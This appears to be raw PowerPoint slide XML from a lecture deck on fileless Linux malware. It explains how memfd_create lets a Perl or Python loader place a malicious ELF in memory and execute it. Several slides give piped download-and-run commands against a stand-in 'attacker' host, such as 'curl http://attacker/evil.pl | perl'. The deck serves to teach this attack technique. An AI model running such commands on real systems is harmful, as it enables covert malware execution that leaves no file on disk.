              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </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20</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135087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In most cases, Linux distributions installed on host devices have pre-installed software. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Python, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> interpreters and C compiler are, as a rule, available “out of the box”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>In addition, PHP is available on hosting platforms. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>So these languages can be used to execute code.</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Pre-installed Software That Can Be Used to Execute Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="891934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To load our executable file on target quickly and easily we can, for example, pipe the script in which source we put the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elf file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perl interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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curl http://attacker/evil_elf.pl |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perl</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="338328"/>
            <a:ext cx="8784976" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Where the File Created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> Are Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="846457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1520" y="3501008"/>
            <a:ext cx="8743411" cy="2088232"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A Scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware Execution</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12930353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1" y="2675466"/>
            <a:ext cx="8435280" cy="3705861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If the target host contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> interpreters, which are common pre-installed software in various distributions nowadays, an attacker can use the shell to execute the following commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://attacker/evil.pl | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>   or the following commands </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ curl http://attacker/evil.py | python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Either command sets download a script to the target host from a remote host, and then invoke an interpreter to execute the script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The above operations do not create a file in a permanent storage of the target host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Execution through Interpreters</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11317785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0" y="2786616"/>
            <a:ext cx="8640959" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>In the Perl script case, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil_elf.pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="759143" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>first executes system call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to configure an anonymous file in the address space of the process, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="759143" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and then writes a malicious ELF binary into this anonymous file,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="759143" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and finally executes the malicious binary. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The malicious ELF still only resides in memory of the process, not in a file at a  permanent storage of the target host. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>As a result, the download operation, injection operation, and execution operation all occurs in memory of the target host. </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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Execution Flow</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3575553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683568" y="2636912"/>
            <a:ext cx="7776864" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> system call is more noteworthy. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This system call is close to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> but it does not return a pointer to the allocated memory but rather returns a file descriptor that refers to an anonymous file that is only visible in the filesystem as a link in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/PID/</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fd</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which may be used to execute it using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>(2).</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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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rPr>
              <a:t>memfd_create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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804091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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Detailed Steps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a: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27</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68893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Stuart case: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elfload.pl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Itw01 case: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elfload.pl</a:t>
            </a:r>
          </a:p>
          <a:p>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Names of Attack Perl Scripts</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1141160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Part 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立記憶體匿名檔案並寫入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案內容 。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Part 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>二進制檔案寫入到建立的檔案當中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Part 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>呼叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>函式執行該匿名檔案。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
